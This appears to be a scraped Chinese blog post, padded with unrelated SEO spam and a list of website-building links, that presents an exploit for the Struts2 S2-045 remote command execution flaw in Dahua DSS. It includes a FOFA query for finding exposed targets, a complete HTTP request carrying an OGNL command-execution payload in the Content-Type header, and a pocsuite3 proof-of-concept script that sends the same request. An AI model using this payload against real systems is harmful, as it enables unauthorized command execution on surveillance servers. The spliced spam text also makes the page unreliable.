当前位置: 首页 > news >正文

高端定制站开发昂昂溪网站建设

高端定制站开发,昂昂溪网站建设,山东省住房和城乡建设厅副厅长,苏州网络公司免责声明 文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…免责声明 文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责 漏洞描述 大华DSS存在s2-45漏洞。 fofa语句 body/portal/include/script/dahuaDefined/headCommon.js?typeindextitleDSS poc语句加检测 GET /admin/login_login.action HTTP/1.1 Host: Content-Type: %{(#nikemultipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdls).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())} Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 poc脚本 脚本用的pocsuite框架 # _*_ coding:utf-8 _*_ # Time : 2023/12/09 19:02 # Author: 炼金术师诸葛亮 from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD, random_strclass dahua_strutsrce(POCBase):pocDesc 大华DSS-struts2-045命令执行author 炼金术师诸葛亮createDate 2023-12-09name 大华DSS-struts2-045命令执行def _verify(self):result {}path /admin/login_login.actionheaders {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0,Content-Type: %{(#nikemultipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdls).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())},Upgrade-Insecure-Requests: 1,Accept-Encoding: gzip, deflate,Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8,Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2}url self.url pathtry:response requests.get(url, headersheaders,verifyFalse)# 验证成功输出相关信息print(response.text)if response.status_code 200 and bin in response.text:result[VerifyInfo] {}result[VerifyInfo][URL] self.urlreturn self.parse_output(result)except Exception as e:passregister_poc(dahua_strutsrce)脚本利用
http://wiki.neutronadmin.com/news/147198/

相关文章:

  • 自己动手建立网站3给网站做seo诊断
  • 网站开发需求问卷天河外贸网站建设
  • 做网站欢迎页什么意思php在线购物网站建设
  • 我需要一个网站wordpress调用ja
  • 福州网站建设制作品牌企业郑州网站优化汉狮网络
  • 做婚介网站可行性报告模板如何维护自己公司网站
  • 网站建设都包含哪些内容学做川菜网站
  • 艾特思成都网站建设绿色网站模版
  • 绥阳网站建设大门户网站
  • 成都网站开发建设it黄页
  • 网站建设公司比较网络市场调研的五个步骤
  • 网站备案需要建设好网站吗时代创信网站设计 北京
  • 单页网站是什么百度指数查询官方网
  • 建设网站过程怎么能看出别人的网站是哪一家做
  • 上海做网站哪家正规公众号怎么制作左右滑动图片
  • 韩城建设局网站公司网站的建设与运营管理制度
  • phpcms v9网站搬站之后掉出来的文章链接显示为以前网站域名不同网站相似的页面百度收录吗
  • html静态网站开发做智能网站
  • 网站文章更新数量汕头论坛建站模板
  • 内蒙古网站优化网站群的建设
  • 手机怎么做淘客网站临汾做网站电话
  • 专业建站公司的业务内容有哪些wordpress 安装配置
  • 郑州机械网站制作vi设计公司成都
  • 手机网站制作代理商文化馆网站建设方案
  • 源代码做的网站好用么一站式网站建设有哪些
  • 网站建设公司的转型php网站开发防注入
  • 公司查名网站怎么在百度打广告
  • 如何查询网站的空间商自己做网站的流程
  • 微网站建设套餐查看wordpress版本号
  • 舞蹈网站模版手机网站建设市场